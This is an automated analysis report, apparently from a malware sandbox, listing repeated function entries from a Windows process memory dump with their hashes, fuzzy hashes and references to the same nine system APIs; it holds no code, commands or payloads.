Opcode ID: 27f5b06a66a92ca6123bbfbb43e9b2436e2c7263da6184cdbb1ccd0bf171409f
Instruction ID: 6cc3b51c200afff8ca8aa3c7753f64cc3fa054acb5c906561fc7e424811e12a3
Opcode Fuzzy Hash: 27f5b06a66a92ca6123bbfbb43e9b2436e2c7263da6184cdbb1ccd0bf171409f
Instruction Fuzzy Hash: 5A728378A116299FCB64DF28DC94A9DBBF1BB48312F1181E6E90DA3315DB309E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE31A4, Relevance: 18.2, APIs: 9, Strings: 1, Instructions: 673librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 1f72a0b878b0fc96a38e209a9bb6aac079e2723bba21ef0c48ff2c65a682f3d4
Instruction ID: ca72ddfe8908bbab34d4f901d6774ae392ebc62af602450ea79cb85e9d66f641
Opcode Fuzzy Hash: 1f72a0b878b0fc96a38e209a9bb6aac079e2723bba21ef0c48ff2c65a682f3d4
Instruction Fuzzy Hash: B0728378A116299FCB64DF28DC94A9DBBF1BB48312F1181E6E909A3315DB309E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE31F8, Relevance: 18.2, APIs: 9, Strings: 1, Instructions: 663librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: e2b7e4b2bff89da360ed44ea330bbf53da973ff271ba40cb7f0e33bd1d060126
Instruction ID: 216ecf3489106d504a6d70f8b7268c57fd72b89e594fe4d775f23e0abeb1de0c
Opcode Fuzzy Hash: e2b7e4b2bff89da360ed44ea330bbf53da973ff271ba40cb7f0e33bd1d060126
Instruction Fuzzy Hash: A2729378A116299FCB64DF28DC94A9DBBF1BB48312F1181E6E90DA3315DB309E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE324C, Relevance: 18.2, APIs: 9, Strings: 1, Instructions: 653librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: c438dc2d8a7e8452fe7dd3a23f9029e13732ab24443082eae9e0d9287e9889d1
Instruction ID: 0619429fb0bb263dee2010bd254840afa0609773f0aa60ee4e22ca24a365f2ac
Opcode Fuzzy Hash: c438dc2d8a7e8452fe7dd3a23f9029e13732ab24443082eae9e0d9287e9889d1
Instruction Fuzzy Hash: 40729478A016299FCB64DF28DC94A9DBBF1BB48312F1181E6E90DA3315DB309E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE32A0, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 643librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 8555bf997ea7fc40c04e9caf80f1864689c9f15a962af60b3cab990ee12bee58
Instruction ID: 13395f5c0ba6fc981b744555e26b4cf8eb47cf6d807ecd202d13535a0b4da8f8
Opcode Fuzzy Hash: 8555bf997ea7fc40c04e9caf80f1864689c9f15a962af60b3cab990ee12bee58
Instruction Fuzzy Hash: FB629478A016299FCB64DF28DC94A9DBBF1BB48312F1181E6E90DA3315DB349E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE32F4, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 633librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 71ea43c569deafbf55e74af3fc079a9b9eaf72dd71a5b38479bb7e0e101e3751
Instruction ID: 5e64902bb5025696a9216166156db95a5b4e38938200b7c5c65b698d1c130cd4
Opcode Fuzzy Hash: 71ea43c569deafbf55e74af3fc079a9b9eaf72dd71a5b38479bb7e0e101e3751
Instruction Fuzzy Hash: 56629478A016299FCB64DF28DC94A9DBBF1BB48312F1181E6E909A3315DB349E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3348, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 621librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 1406c2b7f5654de5cbfb971e382e7d8e7b40250f8ad861f3f9cdef42ae82da89
Instruction ID: 4b6a1a91769accc25454ad44d7589aa200b6c5d4ae00215f14665801640bfff4
Opcode Fuzzy Hash: 1406c2b7f5654de5cbfb971e382e7d8e7b40250f8ad861f3f9cdef42ae82da89
Instruction Fuzzy Hash: AE629478A016299FCB64DF28DC94B9DBBF1BB48312F1181E6E909A3315DB349E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3393, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 613librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 37345bb8ff430868935dfb691ad4637d920f918b564aa577765e61a555c1aa44
Instruction ID: a2bb9e1900a5bfb482be86cd406a0c3a63bf48435540eaec445da66d9a87e1da
Opcode Fuzzy Hash: 37345bb8ff430868935dfb691ad4637d920f918b564aa577765e61a555c1aa44
Instruction Fuzzy Hash: F562A478A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE33E7, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 603librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 2a8b56d3ed330618db014d90ef3e72fea266b0cea7cdeeb0e95f898da4c8f2ba
Instruction ID: 3eee14930f46b1946b36096e753a886737413f910cfa12344ca0b2f2e58de19b
Opcode Fuzzy Hash: 2a8b56d3ed330618db014d90ef3e72fea266b0cea7cdeeb0e95f898da4c8f2ba
Instruction Fuzzy Hash: 7662A478A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE343B, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 593librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 89c33aaa45a3b3b25997f1115060b0c086b465d0b33fab145e175da9dcf65744
Instruction ID: f3284ca0ddcec40bad5e877ff2cb65ea4b5ccde2c4ec9feb3f6bacbc29ffcbc6
Opcode Fuzzy Hash: 89c33aaa45a3b3b25997f1115060b0c086b465d0b33fab145e175da9dcf65744
Instruction Fuzzy Hash: 1F52A578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE348F, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 583librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: c73a19370da95670a93e98b15de16bba8e7583d6609b8a43e483fcbb259c4279
Instruction ID: 3bb1910e5ad1ba87bf37e9ed4851750d24c415fb88a7a011e41895cb6c41c122
Opcode Fuzzy Hash: c73a19370da95670a93e98b15de16bba8e7583d6609b8a43e483fcbb259c4279
Instruction Fuzzy Hash: 3B52A578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE34E3, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 573librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: bf3e826128a0872851a6be32ba4ed52793e2d045f27e8d87239bf8f8a44dac26
Instruction ID: 1598e83a6b061c08db54813552cf6d2f7a571265d11c10304102c52b21d85a3d
Opcode Fuzzy Hash: bf3e826128a0872851a6be32ba4ed52793e2d045f27e8d87239bf8f8a44dac26
Instruction Fuzzy Hash: 1952A578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3537, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 563librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 792f42a36adec6283fd4fddea76c1d15ae1b12237e9f21cc41b2fe5c2a5d2a03
Instruction ID: c3ba4f214fff86ca3640a54c514fb1365f4d291fb3d7848f53f695d620eba9e4
Opcode Fuzzy Hash: 792f42a36adec6283fd4fddea76c1d15ae1b12237e9f21cc41b2fe5c2a5d2a03
Instruction Fuzzy Hash: 59529578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE358B, Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 553librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 6052994ea0cbb151ff3a717ea21331104939163cf166ca3af15a541d3f69953b
Instruction ID: c759dd965e0ae20df71ccd4dc9152da63c713f42ff08c726a953e90f7cc5323f
Opcode Fuzzy Hash: 6052994ea0cbb151ff3a717ea21331104939163cf166ca3af15a541d3f69953b
Instruction Fuzzy Hash: 3F529578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE35DF, Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 543librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 4caaa56fb423209105fb3e9c2eee7ddda2250d60fd4d527acdee36653ad55465
Instruction ID: c027751ed02a7c59062ab156a000cccdd0cb489c567c89763d62ecdbf4b44168
Opcode Fuzzy Hash: 4caaa56fb423209105fb3e9c2eee7ddda2250d60fd4d527acdee36653ad55465
Instruction Fuzzy Hash: B552A578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3633, Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 533librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 58b72a18353257e4a1288f4e762db1782754b0ea7b89b212b6f5f5c10c55f5ca
Instruction ID: d4d73d9bb8f774d54b1068ddc58f7a935e88bde48709118cff2479e003221d44
Opcode Fuzzy Hash: 58b72a18353257e4a1288f4e762db1782754b0ea7b89b212b6f5f5c10c55f5ca
Instruction Fuzzy Hash: 6042A578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3687, Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 521librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: f960bdead40b996ce458882857a840697271c541a09bcd3babe2c25ce8600216
Instruction ID: 91e8f67b1c1794fd2bcb16c08808eea5deaf3765df87ac83e7d52aefdeb78b13
Opcode Fuzzy Hash: f960bdead40b996ce458882857a840697271c541a09bcd3babe2c25ce8600216
Instruction Fuzzy Hash: E942A678A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3315DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE36D2, Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 513librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: e8dfe832320ffcf6b2b07d2491274d2eeef4ecc350ebff1ae70db0248786a3dd
Instruction ID: 2742ebf3243e2b30c69e51c50f8bbbaa3b59f8fea361043dc6f25fef526867f8
Opcode Fuzzy Hash: e8dfe832320ffcf6b2b07d2491274d2eeef4ecc350ebff1ae70db0248786a3dd
Instruction Fuzzy Hash: 9242A578A016299FCB64DF68DC94B9DBBF1BB48312F1181E6E909A3355DB349E81CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3726, Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 501librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: 467f15f68561d1fe8e46993fc40429e43ab1b459c2491bd0650fae04b2c0c880
Instruction ID: ef6d8f5562d0f913b9790cd42556df0aa5cdd641ec0c2699afb20205bf2a0c2b
Opcode Fuzzy Hash: 467f15f68561d1fe8e46993fc40429e43ab1b459c2491bd0650fae04b2c0c880
Instruction Fuzzy Hash: EE42B678A016299FCB64DF68DC94B9DBBF2BB48312F1181E6D909A3315DB349E81CF04

Uniqueness

Uniqueness Score: -1.00%

Function 1FEE3771, Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 493librarywindowCOMMON

Download Yara Rule

APIs

PrivateExtractIconExW.USER32 ref: 1FEE3795
WerpLaunchAeDebug.KERNEL32 ref: 1FEE39D2
WerpLaunchAeDebug.KERNEL32 ref: 1FEE3A29
WerRegisterFileWorker.KERNEL32 ref: 1FEE3A80
WerRegisterRuntimeExceptionModuleWorker.KERNEL32 ref: 1FEE3AFD
LdrInitializeThunk.NTDLL ref: 1FEE3C03
BasepReportFault.KERNEL32 ref: 1FEE40B4
BasepInitAppCompatData.KERNEL32 ref: 1FEE41B9
QuirkGetData2Worker.KERNEL32 ref: 1FEE4210

Strings

:@fq, xrefs: 1FEE3CBB

Memory Dump Source

Source File: 00000003.00000002.909022396.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false

Similarity

API ID: Worker$BasepDebugLaunchRegisterWerp$CompatDataData2ExceptionExtractFaultFileIconInitInitializeModulePrivateQuirkReportRuntimeThunk
String ID: :@fq
API String ID: 1653875268-3673016210
Opcode ID: f59917d92484cb1ca09b70956424b611a01e4ac11d9517d279d79911bad871a6
